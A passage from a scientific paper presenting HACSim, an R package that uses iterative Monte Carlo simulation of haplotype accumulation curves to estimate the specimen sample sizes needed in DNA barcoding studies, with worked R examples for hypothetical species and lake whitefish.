sample sizes ranging from 150–5,400 individuals across 18 species of ray-finned fishes (Chordata: Actinopterygii) were found by Phillips et al. (2015). Haplotype accumulation curves paint a picture of observed standing genetic variation that exists at the species level as a function of expended sampling effort (Phillips et al., 2015; Phillips, Gillis & Hanner, 2019). Haplotype sampling completeness can then be gauged through measuring the slope of the curve, which gives an indication of the number of new haplotypes likely to be uncovered with additional specimens collected. For instance, a haplotype accumulation curve for a hypothetical species having a slope of 0.01 suggests that only one previously unseen haplotype will be captured for every 100 individuals found. This is strong evidence that the haplotype diversity for this species has been adequately sampled. Thus, further recovery of specimens of such species provide limited returns on the time and money invested to sequence them. Trends observed from generated haplotype accumulation curves for the 18 actinopterygian species assessed by Phillips et al. (2015), which were far from reaching an asymptote, corroborated the finding that the majority of intraspecific haplotypes remain largely unsampled in Actinopterygii for even the best-represented species in BOLD. Estimates obtained from each of these studies stand in sharp contrast to sample sizes typically reported within DNA barcoding studies. Numerical optimization methods are required to obtain reasonable approximations to otherwise complex questions. Many such problems proceed via the iterative method, whereby an initial guess is used to produce a sequence of successively more precise (and hopefully more accurate) approximations. Such an approach is attractive, as resulting solutions can be made as precise as desired through specifying a given tolerance cutoff. However, in such cases, a closed-form expression for the function being optimized is known a priori. In many instances, the general path (behaviour) of the search space being Phillips et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.243 3/37 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.243 explored is the only information known, and not its underlying functional form. In this paper, we take a middle-ground approach that is an alternative to probing sampling completeness on the basis of haplotype accumulation curve slope measurement. To this end, iteration is applied to address the issue of relative sample size determination for DNA barcode haplotype sampling completeness, a technique suggested by Phillips, Gillis & Hanner (2019). Given that specimen collection and processing is quite a laborious and costly endeavour (Cameron, Rubinoff & Will, 2006; Stein et al., 2014), the next most direct solution to an otherwise blind search strategy is to employ computational simulation that approximates specimen collection in the field. The main contribution of this work is the introduction of a new, easy-to-use R package implementing a novel statistical optimization algorithm to estimate sample sizes for assessment of genetic diversity within species based on saturation observed in haplotype accumulation curves. Here, we present a novel nonparametric stochastic (Monte Carlo) iterative extrapolation algorithm for the generation of haplotype accumulation curves based on the approach of Phillips et al. (2015). Using the statistical environment R (R Core Team, 2018), we examine the effect of altering species haplotype frequencies on the shape of resulting curves to inform on likely required sample sizes needed for adequate capture of within-species haplotype variation. Proof-of-concept of our method is illustrated through both hypothetical examples and real DNA sequence data. Motivation Consider N DNA sequences that are randomly sampled for a given species of interest across its known geographic range, each of which correspond to a single specimen. Suppose further that H* of such sampled DNA sequences are unique (i.e., are distinct haplotypes). This scenario leads naturally to the following question: What is N*, the estimated total number of DNA sequence haplotypes that exist for a species θ? Put another way, what sample size (number of specimens) is needed to capture the existing haplotype variation for a species? The naïve approach (adopted by Phillips et al. (2015)) would be to ignore relative frequencies of observed haplotypes; that is, assume that species haplotypes are equally probable in a species population. Thus, in the absence of any information, the best one can do is adopt a uniform distribution for the number of sampled haplotypes. Such a path leads to obtaining gross overestimates for sufficient sampling (Phillips et al., 2015). A much better approach uses all available haplotype data to arrive at plausible estimates of required taxon sample sizes. This latter method is explored here in detail. METHODS Haplotype accumulation curve simulation algorithm Algorithm functions Our algorithm, HACSim (short for Haplotype Accumulation Curve Simulator), consisting of two user-defined R functions, HAC.sim() and HAC.simrep(), was created to run simulations of haplotype accumulation curves based on user-supplied parameters. The simulation treats species haplotypes as distinct character labels relative to the number of individuals possessing a given haplotype. The usual convention in this regard is that Phillips et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.243 4/37 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.243 Figure 1 Modified haplotype network from Phillips, Gillis & Hanner (2019). Haplotypes are labelled according to their absolute frequencies such that the most frequent haplotype is labelled ‘‘1’’, the second- most frequent haplotype is labelled ‘‘2’’, etc., and is meant to illustrate that much species locus variation consists of rare haplotypes at very low frequency (typically only represented by 1 or 2 specimens). Thus, species showing such patterns in their haplotype distributions are probably grossly under-respresented in public sequence databases like BOLD and GenBank. Full-size DOI: 10.7717/peerjcs.243/fig-1 Haplotype 1 is the most frequent, Haplotype 2 is the next most frequent, etc. (Gwiazdowski et al., 2013). A haplotype network represents this scheme succinctly (Fig. 1). Such an implementation closely mimics that seen in natural species populations, as each character label functions as a unique haplotype linked to a unique DNA barcode sequence. The algorithm then randomly samples species haplotype labels in an iterative fashion with replacement until all unique haplotypes have been observed. This process continues until all species haplotypes have been sampled. The idea is that levels of species haplotypic variation that are currently catalogued in BOLD can serve as proxies for total haplotype diversity that may exist for a given species. This is a reasonable assumption given that, while estimators of expected diversity are known (e.g., Chao1 abundance) (Chao, 1984), the frequencies of unseen haplotypes are not known a priori. Further, assuming a species is sampled across its entire geographic range, haplotypes not yet encountered are presumed to occur at low frequencies (otherwise they would likely have already been sampled). Because R is an interpreted programming language (i.e., code is run line-by-line), it is slow compared to faster alternatives which use compilation to convert programs into machine-readable format; as such, to optimize performance of the present algorithm in terms of runtime, computationally-intensive parts of the simulation code were written in the C++ programming language and integrated with R via the packages Rcpp (Eddelbuettel & François, 2011) and RcppArmadillo (Eddelbuettel & Sanderson, 2014). This includes Phillips et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.243 5/37 https://peerj.com https://doi.org/10.7717/peerjcs.243/fig-1 http://dx.doi.org/10.7717/peerj-cs.243 function code to carry out haplotype accumulation (via the function accumulate(), which is not directly called by the user). A further reason for turning to C++ is because some R code (e.g., nested ‘for’ loops) is not easily vectorized, nor can parallelization be employed for speed improvement due to loop dependence. The rationale for employing R for the present work is clear: R is free, open-source software that it is gaining widespread use within the DNA barcoding community due to its ease-of-use and well-established user-contributed package repository (Comprehensive R Archive Network (CRAN)). As such, the creation and disemination of HACSim as a R framework to assess levels of standing genetic variation within species is greatly facilitated. A similar approach to the novel one proposed here to automatically generate haplotype accumulation curves from DNA sequence data is implemented in the R package spider (SPecies IDentity and Evolution in R; (Brown et al., 2012)) using the haploAccum() function. However, the approach, which formed the basis of earlier work carried out by Phillips et al. (2015), is quite restrictive in its functionality and, to our knowledge, is currently the only method available to generate haplotype accumulation curves in R because spider generates haplotype accumulation curves from DNA sequence alignments only and is not amenable to inclusion of numeric inputs for specimen and haplotype numbers. Thus, the method could not be easily extended to address our question. This was the primary reason for the proposal of a statistical model of sampling sufficiency by Phillips et al. (2015) and its extension described herein. Algorithm parameters At present, the algorithm (consisting of HAC.sim() and HAC.simrep()) takes 13 arguments as input (Table 1). A user must first specify the number of observed specimens/DNA sequences (N) and the number of observed haplotypes (i.e., unique DNA sequences) (H*) for a given species. Both N and H* must be greater than one. Clearly, N must be greater than or equal to H*. Next, the haplotype frequency distribution vector must be specified. The probs argument allows for the inclusion of both common and rare species haplotypes according to user interest (e.g., equally frequent haplotypes, or a single dominant haplotype). The resulting probs vector must have a length equal to H*. For example, if H*=4, probs must contain four elements. The total probability of all unique haplotypes must sum to one. The user can optionally input the fraction of observed haplotypes to capture p. By default, p=0.95, mirroring the approach taken by both Zhang et al. (2010) and Bergsten et al. (2012) who computed intraspecific sample sizes needed to recover 95% of all haplotype variation for a species. At this level, the generated haplotype accumulation curve reaches a slope close to zero and further sampling effort is unlikely to uncover any new haplotypes. However, a user may wish to obtain sample sizes corresponding to different haplotype recovery levels, e.g., p=0.99 (99% of all estimated haplotypes found). In the latter scenario, it can be argued that 100% of species haplotype variation is never actually achieved, since with greater sampling effort, additional haplotypes are almost surely to be found; thus, a true asymptote is never reached. In any case, simulation completion times will vary Phillips et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.243 6/37 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.243 Table 1 Parameters inputted (first 7) and outputted (last six) by HAC.sim() and HAC.simrep(), along with their definitions. Range refers to plausible values that each parameter can assume within the hap- lotype accumulation curve simulation algorithm. [ and ] indicate that a given value is included in the range interval; whereas, ( and ) indicate that a given value is excluded from the range interval. Simulation progress can be tracked through setting progress = TRUE within HACHypothetical() or HACReal(). Users can optionally specify that a file be created containing all information outputted to the R console (via the argument filename, which can be named as the user wishes). Parameter Definition Range N total number of specimens/DNA sequences (1,∞) H* total number of unique haplotypes (1, N] probs haplotype probability distribution vector (0, 1) p proportion of haplotypes to recover (0, 1] perms total number of permutations (1,∞) input.seqs analyze FASTA file of species DNA sequences TRUE, FALSE conf.level desired confidence level for confidence interval calculation (0, 1) H cumulative mean number of haplotypes sampled [1, H∗] H∗−H cumulative mean number of haplotypes not sampled [0, H∗) R= HH∗ cumulative mean fraction of haplotypes sampled (0, 1] H∗−H H∗ cumulative mean fraction of haplotypes not sampled [0, 1) N∗ mean specimen sample size corresponding to H∗ [ N ,∞) N∗−N mean number of individuals not sampled [0, N] depending on inputted parameter values, such as probs, which controls the skewness of the observed haplotype frequency distribution. The perms argument is in place to ensure that haplotype accumulation curves ‘‘smooth out’’ and tend to H* asymptotically as the number of permutations (replications) is increased. The effect of increasing the number of permutations is an increase in statistical accuracy and consequently, a reduction in variance. The proposed simulation algorithm outputs a mean haplotype accumulation curve that is the average of perms generated haplotype accumulation curves, where the order of individuals that are sampled is randomized. Each of these perms curves is a randomized step function (a sort of random walk), generated according to the number of haplotypes found. A permutation size of 1,000 was used by Phillips et al. (2015) because smaller permutation sizes yielded non-smooth (noisy) curves. Permutation sizes larger than 1,000 typically resulted in greater computation time, with no noticeable change in accumulation curve behaviour (Phillips et al., 2015). By default, perms = 10,000 (in contrast to Phillips et al. (2015)), which is comparable to the large number of replicates typically employed in statistical bootstrapping procedures needed to ensure accuracy of computed estimates (Efron, 1979). Sometimes it will be necessary for users to sacrifice accuracy for speed in the presence of time constraints. This can be accomplished through decreasing perms. Doing so however will result in only near-optimal solutions for specimen sample sizes. In some cases, it may be necessary to increase perms to further smooth out the curves (to ensure monotonicity), but this will increase algorithm runtime substantially. Should a user wish to analyze their own intraspecific COI DNA barcode sequence data (or sequence data from any single locus for that matter), setting input.seqs = Phillips et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.243 7/37 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.243 TRUE allows this (via the read.dna() function in ape). In such a case, a pop-up file window will prompt the user to select the formatted FASTA file of aligned/trimmed sequences to be read into R. When this occurs, arguments for N , H* and probs are set automatically by the algorithm via functions available in the R packages ape (Analysis of Phylogenetics and Evolution) (Paradis, Claude & Strimmer, 2004) and pegas (Population and Evolutionary Genetics Analysis System) (Paradis, 2010). Users must be aware however that the number of observed haplotypes treated by pegas (via the haplotype() function) may be overestimated if missing/ambiguous nucleotide data are present within the final alignment input file. Missing data are explicitly handled by the base.freq() function in the ape package. When this occurs, R will output a warning that such data are present within the alignment. Users should therefore consider removing sequences or sites comprising missing/ambiguous nucleotides. This step can be accomplished using external software such as MEGA (Molecular Evolutionary Genetics Analysis; (Kumar, Stecher & Tamura, 2016)). The BARCODE standard (Hanner, 2009) was developed to help identify high quality sequences and can be used as a quality filter if desired. Exclusion of low-quality sequences also has the advantage of speeding up compution time of the algorithm significantly. Options for confidence interval (CI) estimation and graphical display of haplotype accumulation is also available via the argument conf.level, which allows the user to specify the desired level of statistical confidence. CIs are computed from the sample α 2 100% and (1− α 2 )100% quantiles of the haplotype accumulation curve distribution. The default is conf.level = 0.95, corresponding to a confidence level of 95%. High levels of statistical confidence (e.g., 99%) will result in wider confidence intervals; whereas low confidence leads to narrower interval estimates. How does HACSim work? Haplotype labels are first randomly placed on a two-dimensional spatial grid of size perms × N (read perms rows by N columns) according to their overall frequency of occurrence (Fig. 2). The cumulative mean number of haplotypes is then computed along each column (i.e., for every specimen). If all H* haplotypes are not observed, then the grid is expanded to a size of perms×N* and the observed haplotypes enumerated. Estimation of specimen sample sizes proceeds iteratively, in which the current value of N* is used as a starting value to the next iteration (Fig. 2). An analogy here can be made to a game of golf: as one aims towards the hole and hits the ball, it gets closer and closer to the hole; however, one does not know the number of times to hit the ball before it lands in the hole. It is important to note that since sample sizes must be whole values, estimates of N* found at each iteration are rounded up to the next whole number. Even though this approach is quite conservative, it ensures that estimates are adequately reflective of the population from which they were drawn. HAC.sim(), which is called internally from HAC.simrep(), performs a single iteration of haplotype accumulation for a given species. In the case of real species, resulting output reflects current levels of sampling effort found within BOLD (or another similar sequence repository such as GenBank) for a given species. If the desired level of haplotype recovery is not reached, then HAC.simrep() is called to perform successive iterations until Phillips et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.243 8/37 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.243 Figure 2 Schematic of the HACSim optimization algorithm (setup, initialization and iteration). Shown is a hypothetical example for a species mined from a biological sequence database like BOLD or GenBank with N =5 sampled specimens (DNA sequences) possessing H*=5 unique haplotypes. Each haplotype has an associated numeric ID from 1-H* (here, 1-5). Haplotype labels are randomly assigned to cells on a two-dimensional spatial array (ARRAY) with perms rows and N columns. All haplotypes occur with a frequency of 20%, (i.e., probs= (1/5, 1/5, 1/5, 1/5, 1/5)). Specimen and haplotype information is then fed into a black box to iteratively optimize the likely required sample size (N*) needed to capture a propor- tion of at least p haplotypes observed in the species sample. Full-size DOI: 10.7717/peerjcs.243/fig-2 the observed fraction of haplotypes captured (R) is at least p. This stopping criterion is the termination condition necessary to halt the algorithm as soon as a ‘‘good enough’’ solution has been found. Such criteria are widely employed within numerical analysis. At each step of the algorithm, a dataset, in the form of a dataframe (called ‘‘d’’) consisting of the mean number of haplotypes recovered (called means), along with the estimated standard deviation (sds) and the number of specimens sampled (specs) is generated. The estimated required sample size (N*) to recover a given proportion of observed species haplotypes corresponds to the endpoint of the accumulation curve. An indicator message is additionally outputted informing a user as to whether or not the desired level of haplotype recovery has been reached. The algorithm is depicted in Fig. 3. In Fig. 3, all input parameters are known a priori except Hi, which is the number of haplotypes found at each iteration of the algorithm, and Ri = Hi H∗ , which is the observed fraction of haplotype recovery at iteration i. The equation to compute N* N∗i+1=Ni+ Ni Hi ( H∗−Hi ) = NiH∗ Hi = Ni Ri (1) is quite intuitive since as Hi approaches H*, H∗−Hi approaches zero, Ri= Hi H∗ approaches one, and consequently, Ni approaches N*. In the first part of the above equation, the quantity NiHi (H ∗ −Hi) is the amount by which the haplotype accumulation curve is extrapolated, which incorporates random error and uncertainty regarding the true value of θ in the search space being explored. Nonparametric estimates formed from the above Phillips et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.243 9/37 https://peerj.com https://doi.org/10.7717/peerjcs.243/fig-2 http://dx.doi.org/10.7717/peerj-cs.243 Figure 3 Iterative extrapolation algorithm pseudocode for the computation of taxon sampling suffi- ciency employed within HACSim. A user must input N , H* and probs to run simulations. Other function arguments required by the algorithm have default values and are not necessary to be inputted unless the user wishes to alter set parameters. Full-size DOI: 10.7717/peerjcs.243/fig-3 iterative method produce a convergent monotonically-increasing sequence, which becomes closer and closer to N* as the number of iterations increase; that is, N∗1 ≤N ∗ 2 ≤ ...≤N ∗ i ≤N ∗ i+1→N ∗ (2) which is clearly a desirable property. Since haplotype accumulation curves are bounded below by one and bounded above by H*, then the above sequence has a lower bound equal to the initial guess for specimen sampling sufficiency (N) and an upper bound of N*. Along with the iterated haplotype accumulation curves and haplotype frequency barplots, simulation output consists of the five initially proposed ‘‘measures of sampling closeness’’, the estimate of θ (N*) based on Phillips et al. (2015)’s sampling model, in addition to the number of additional samples needed to recover all estimated total haplotype variation for a given species (N∗−N ; Fig. 4) (Table 1). These five quantities are given as follows: (1) Mean number of haplotypes sampled: Hi, (2) Mean number of haplotypes not sampled: H∗−Hi, (3) Proportion of haplotypes sampled: HiH∗ , (4) Proportion of haplotypes not sampled: H∗−Hi H∗ , (5) Mean number of individuals not sampled: N∗−Ni = Ni Hi (H∗−Hi) and are analogous to absolute and relative approximation error metrics seen in numerical analysis. It should be noted that the mean number of haplotypes captured at each iteration, Hi, will not necessary be increasing, even though estimates of the cumulative mean value of N* are. It is easily seen above that Hi approaches H* with increasing number of iterations. Similarly, as the simulation progresses, H∗−Hi, H∗−Hi H∗ and N ∗ −Ni = Ni Hi (H∗−Hi) all approach zero, while HiH∗ approaches one. The rate at which curves approach H* depends on inputs to both HAC.sim() and HAC.simrep(). Once the algorithm has converged to the desired level of haplotype recovery, a summary of findings is outputted consisting of (1) the initial guess (N) for sampling sufficiency; (2) the total number of iterations until convergence and simulation runtime (in seconds); (3) the final estimate (N*) of sampling sufficiency, along with an approximate (1 −α)100% confidence interval (see next paragraph); and, (4) the Phillips et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.243 10/37 https://peerj.com https://doi.org/10.7717/peerjcs.243/fig-3 http://dx.doi.org/10.7717/peerj-cs.243 Figure 4 Graphical depiction of the iterative extrapolation sampling model as described in detail herein. The figure is modified from Phillips, Gillis & Hanner (2019). The x-axis is meant to depict the number of specimens sampled, whereas the y-axis is meant to convey the cumulative number of unique haplotypes uncovered for every additional individual that is randomly sampled. Ni and Hi refer respectively to specimen and haplotype numbers that are observed at each iteration ( i) of HACSim for a given species. N* is the total sample size that is needed to capture all H* haplotypes that exist for a species. Full-size DOI: 10.7717/peerjcs.243/fig-4 number of additional specimens required to be sampled (N∗−N) from the initial starting value. Iterations are automatically separated by a progress meter for easy visualization. An approximate symmetric (1 − α)100% CI for θ is derived using the (first order) Delta Method (Casella & Berger, 2002). This approach relies on the asymptotic normality result of the CLT and employs a first-order Taylor series expansion around θ to arrive at an approximation of the variance (and corresponding standard error) of N*. Such an approach is convenient since the sampling distribution of N* would likely be difficult to compute exactly due to specimen sample sizes being highly taxon-dependent. An approximate (large sample) (1 −α)100% CI for θ is given by N∗±z1−α2 ( σ̂H H √ N∗ ) (3) where z1−α2 denotes the appropriate critical value from the standard Normal distribution and σ̂H is the estimated standard deviation of the mean number of haplotypes recovered at N*. The interval produced by this approach is quite tight, shrinking as Hi tends to H*. By default, HACSim computes 95% confidence intervals for the abovementioned quantities. It is important to consider how a confidence interval for θ should be interpreted. For instance, a 95% CI for θ of (L, U), where L and U are the lower and upper endpoints of the confidence interval respectively, does not mean that the true sampling sufficiency lies between (L, U) with 95% probability. Instead, resulting confidence intervals for θ are themselves random and should be interpreted in the following way: with repeated sampling, one can be (1 − α)100% confident that the true sampling sufficency for p% haplotype recovery for a given species lies in the range (L, U) (1 − α)100% of the time. Phillips et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.243 11/37 https://peerj.com https://doi.org/10.7717/peerjcs.243/fig-4 http://dx.doi.org/10.7717/peerj-cs.243 That is, on average, (1 − α)100% of constructed confidence intervals will contain θ (1 − α)100% of the time. It should be noted however that as given computed confidence intervals are only approximate in the limit, desired nominal probability coverage may not be achieved. In other words, the proportion of times calculated (1 − α)100% intervals actually contain θ may not be met. HACSim has been implemented as an object-oriented framework to improve modularity and overall user-friendliness. Scenarios of hypothetical and real species are contained within helper functions which comprise all information necessary to run simulations successfully without having to specify certain function arguments beforehand. To carry out simulations of sampling haplotypes from hypothetical species, the function HACHypothetical() must first be called. Similarly, haplotype sampling for real species is handled by the function HACReal(). In addition to all input parameters rquired by HAC.sim() and HAC.simrep() outlined in Table 1, both HACHypothetical() and HACReal() take further arguments. Both functions take the optional argument filename which is used to save results outputted to the R console to a CSV file. When either HACHypothetical() or HACReal() is invoked (i.e., assigned to a variable), an object herein called HACSObj is created containing the 13 arguments employed by HACSim in running simulations. Note the generated object can have any name the user desires. Further, all simulation variables are contained in an environment called ‘envr’ that is hidden from the user. RESULTS Here, we outline some simple examples that highlight the overall functionality of HACSim. When the code below is run, outputted results will likely differ from those depicted here since our method is inherently stochastic. Hence, it should be stressed that there is not one single solution for the problem at hand, but rather multiple solutions (Spall, 2012). This is in contrast to a completely deterministic model, where a given input always leads to the same unique output. To ensure reproducibility, the user can set a random seed value using the base R function set.seed() prior to running HAC.simrep(). It is important that a user set a working directory in R prior to running HACSim, which will ensure all created files (‘seqs.fas’ and ‘output.csv’) are stored in a single location for easy access and reference at a later time. In all scenarios, default parameters were unchanged (perms=10,000, p=0.95). Application of HACSim to hypothetical species Equal haplotype frequencies Figure 5 shows sample graphical output of the proposed haplotype accumulation curve simulation algorithm for a hypothetical species with N =100 and H*=10. All haplotypes are assumed to occur with equal frequency (i.e., probs=0.10). Algorithm output is shown below. Phillips et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.243 12/37 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.243 ## Set parameters for hypothetical species ## > N<-100 # total number of sampled individuals > Hstar<-10 # total number of haplotypes > probs<-rep(1/Hstar, Hstar) # equal haplotype frequency ### Run simulations ### > HACSObj<-HACHypothetical(N = N, Hstar = Hstar, probs = probs) # call helper function # set seed here if desired, e.g., set.seed(12345) > HAC.simrep(HACSObj) Simulating haplotype accumulation... |===============================================================================| 100% ---Measures of Sampling Closeness --- Mean number of haplotypes sampled: 10 Mean number of haplotypes not sampled: 0 Proportion of haplotypes sampled: 1 Proportion of haplotypes not sampled: 0 Mean value of N*: 100 Mean number of specimens not sampled: 0 Desired level of haplotype recovery has been reached ---------- Finished. ---------- The initial guess for sampling sufficiency was N = 100 individuals The algorithm converged after 1 iterations and took 3.637 s The estimate of sampling sufficiency for p = 95% haplotype recovery is N* = 100 individuals ( 95% CI: 100-100 ) The number of additional specimens required to be sampled for p = 95% haplotype recovery is N* - N = 0 individuals Algorithm output shows that R = 100% of the H* = 10 haplotypes are recovered from the random sampling of N = 100 individuals, with lower and upper 95% confidence limits of 100–100. No additional specimens need to be collected (N∗−N =0). Simulation results, consisting of the six ‘‘measures of sampling closeness’’ computed at each iteration, can be optionally saved in a comma-separated value (CSV) file called ‘output.csv’ (or another filename of the user’s choosing). Figure 5 shows that when haplotypes are equally frequent in species populations, corresponding haplotype accumulation curves reach an asymptote very quickly. As sampling effort is increased, the confidence interval becomes narrower, thereby reflecting one’s increased confidence in having likely sampled the majority of haplotype variation existing for a given species. Expected counts of the number of specimens possessing a given haplotype can be found from running max(envr$d$specs) * envr$probs in the R console once a simulation has converged. However, real data suggest that haplotype frequencies are not equal. Phillips et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.243 13/37 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.243 Figure 5 Graphical output of HAC.sim() for a hypothetical species with equal haplotype frequen- cies. (A) Iterated haplotype accumulation curve. (B) Corresponding haplotype frequency barplot. For the generated haplotype accumulation curve, the 95% confidence interval for the number of unique haplo- types accumulated is depicted by gray error bars. Dashed lines depict the observed number of haplotypes (i.e., RH*) and corresponding number of individuals sampled found at each iteration of the algorithm. The dotted line depicts the expected number of haplotypes for a given haplotype recovery level (here, p= 95%) (i.e., pH*). In this example, R=100% of the H*=10 estimated haplotypes have been recovered for this species based on a sample size of only N =100 specimens. Full-size DOI: 10.7717/peerjcs.243/fig-5 Unequal Haplotype Frequencies Figures 6 and 7 show sample graphical output of the proposed haplotype accumulation curve simulation algorithm for a hypothetical species with N = 100 and H* = 10. All haplotypes occur with unequal frequency. Haplotypes 1–3 each have a frequency of 30%, while the remaining seven haplotypes each occur with a frequency of c. 1.4%. ## Set parameters for hypothetical species ## > N<-100 > Hstar<-10 > probs<-c(rep(0.30, 3), rep(0.10/7, 7)) # three dominant haplotypes each with 30% frequency ### Run simulations ### > HACSObj<-HACHypothetical(N = N, Hstar = Hstar, probs = probs) > HAC.simrep(HACSObj) Simulating haplotype accumulation... |========================================================================| 100% ---Measures of Sampling Closeness --- Mean number of haplotypes sampled: 8.3291 Mean number of haplotypes not sampled: 1.6709 Proportion of haplotypes sampled: 0.83291 Proportion of haplotypes not sampled: 0.16709 Mean value of N*: 120.061 Mean number of specimens not sampled: 20.06099 Phillips et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.243 14/37 https://peerj.com https://doi.org/10.7717/peerjcs.243/fig-5 http://dx.doi.org/10.7717/peerj-cs.243 Desired level of haplotype recovery has not yet been reached |================================================================| 100% ---Measures of Sampling Closeness --- Mean number of haplotypes sampled: 9.2999 Mean number of haplotypes not sampled: 0.7001 Proportion of haplotypes sampled: 0.92999 Proportion of haplotypes not sampled: 0.07001 Mean value of N*: 179.5718 Mean number of specimens not sampled: 12.57182 Desired level of haplotype recovery has not yet been reached |==================================================================| 100% ---Measures of Sampling Closeness --- Mean number of haplotypes sampled: 9.5358 Mean number of haplotypes not sampled: 0.4642 Proportion of haplotypes sampled: 0.95358 Proportion of haplotypes not sampled: 0.04642 Mean value of N*: 188.7623 Mean number of specimens not sampled: 8.762348 Desired level of haplotype recovery has been reached ---------- Finished. ---------- The initial guess for sampling sufficiency was N = 100 individuals The algorithm converged after 6 iterations and took 33.215 s The estimate of sampling sufficiency for p = 95% haplotype recovery is N∗ = 180 individuals ( 95% CI: 178.278-181.722 ) The number of additional specimens required to be sampled for p = 95% haplotype recovery is N* - N = 80 individuals Note that not all iterations are displayed above for the sake of brevity; only the first and last two iterations are given. With an initial guess of N = 100, only R=83.3% of all H* = 10 observed haplotypes are recovered. The value of N* = 121 in the first iteration above serves as an improved initial guess of the true sampling sufficiency, which is an unknown quantity that is being estimated. This value is then fed back into the algorithm and the process is repeated until convergence is reached. UsingEq. (1),theimprovedsamplesizewascalculatedasN∗=100+ 1008.3291 (10−8.3291)= 120.061. After one iteration, the curve has been extrapolated by an additional N∗−Ni=20.06099 individuals. Upon convergence, R=95.4% of all observed haplotypes are captured with a sample size of N*=180 specimens, with a 95% CI of 178.278–181.722. Given that N =100 individuals have already been sampled, the number of additional specimens required is N∗−N =80 individuals. The user can verify that sample sizes close to that found by HACSim are needed to capture 95% of existing haplotype variation. Simply set N = N* = 180 and rerun the algorithm. The last iteration serves as a check to verify that the desired level of haplotype recovery has been achieved. The value of N*=188.7623 that is outputted at this step can be used as a good starting guess to extrapolate the curve Phillips et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.243 15/37 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.243 Figure 6 Initial graphical output of HAC.sim() for a hypothetical species having three dominant hap- lotypes. (A) Specimens sampled; (B) Unique haplotypes. In this example, initially, only R = 83.3% of the H*=10 estimated haplotypes have been recovered for this species based on a sample size of N =100 specimens. Full-size DOI: 10.7717/peerjcs.243/fig-6 Figure 7 Final graphical output of HAC.sim() for a hypothetical species having three dominant haplo- types. (A) Specimens sampled; (B) Unique haplotypes. In this example, upon convergence, R=95.4% of the H*=10 estimated haplotypes have been recovered for this species based on a sample size of N =180 specimens. Full-size DOI: 10.7717/peerjcs.243/fig-7 to higher levels of haplotype recovery to save on the number of iterations required to reach convergence. To do this, one simply runs HACHypothetical() with N = 189. Application of HACSim to real species Because the proposed iterative haplotype accumulation curve simulation algorithm simply treats haplotypes as numeric labels, it is easily generalized to any biological taxa and genetic loci for which a large number of high-quality DNA sequence data records is available in public databases such as BOLD. In the following examples, HACSim is employed to examine levels of standing genetic variation within animal species using 5′-COI. Phillips et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.243 16/37 https://peerj.com https://doi.org/10.7717/peerjcs.243/fig-6 https://doi.org/10.7717/peerjcs.243/fig-7 http://dx.doi.org/10.7717/peerj-cs.243 Lake Whitefish (Coregonus clupeaformis) An interesting case study on which to focus is that of Lake whitefish (Coregonus clupeaformis). Lake whitefish are a commercially, culturally, ecologically and economically important group of salmonid fishes found throughout the Laurentian Great Lakes in Canada and the United States, particularly to the Saugeen Ojibway First Nation (SON) of Bruce Peninsula in Ontario, Canada, as well as non-indigenous fisheries (Ryan & Crawford, 2014). The colonization of refugia during Pleistocene glaciation is thought to have resulted in high levels of cryptic species diversity in North American freshwater fishes (Hubert et al., 2008; April et al., 2011; April et al., 2013a; April et al., 2013b). Overdyk et al. (2015) wished to investigate this hypothesis in larval Lake Huron lake whitefish. Despite limited levels of gene flow and likely formation of novel divergent haplotypes in this species, surprisingly, no evidence of deep evolutionary lineages was observed across the three major basins of Lake Huron despite marked differences in larval phenotype and adult fish spawning behaviour (Overdyk et al., 2015). This may be the result of limited sampling of intraspecific genetic variation, in addition to presumed panmixia (Overdyk et al., 2015). While lake whitefish represent one of the most well-studied fishes within BOLD, sampling effort for this species has nevertheless remained relatively static over the past few years. Thus, lake whitefish represent an ideal species for further exploration using HACSim. In applying the developed algorithm to real species, sequence data preparation methodology followed that which is outlined in Phillips et al. (2015). Curation included the exclusion of specimens linked to GenBank entries, since those records without the BARCODE keyword designation lack appropriate metadata central to reference sequence library construction and management (Hanner, 2009). Our approach here was solely to assess comprehensiveness of single genomic sequence databases rather than incorporating sequence data from multiple repositories; thus, all DNA barcode sequences either originating from, or submitted to GenBank were not considered further. As well, the presence of base ambiguities and gaps/indels within sequence alignments can lead to bias in estimate haplotype diversity for a given species. Currently (as of November 28, 2018), BOLD contains public (both barcode and non-barcode) records for 262 C. clupeaformis specimens collected from Lake Huron in northern parts of Ontario, Canada and Michigan, USA. Of the barcode sequences, N = 235 are of high quality (full-length (652 bp) and comprise no missing and/or ambiguous nucleotide bases). Haplotype analysis reveals that this species currently comprises H*=15 unique COI haplotypes. Further, this species shows a highly-skewed haplotype frequency distribution, with a single dominant haplotype accounting for c. 91.5% (215/235) of all individuals (Fig. 8). The output of HACSim is displayed below. Phillips et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.243 17/37 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.243 ### Run simulations ### > HACSObj<-HACReal() > HAC.simrep(HACSObj) Simulating haplotype accumulation... | =====================================================| 100% --- Measures of Sampling Closeness --- Mean number of haplotypes sampled: 11.0705 Mean number of haplotypes not sampled: 3.9295 Proportion of haplotypes sampled: 0.7380333 Proportion of haplotypes not sampled: 0.2619667 Mean value of N*: 318.4138 Mean number of specimens not sampled: 83.4138 Desired level of haplotype recovery has not yet been reached | =======================================================| 100% ---Measures of Sampling Closeness --- 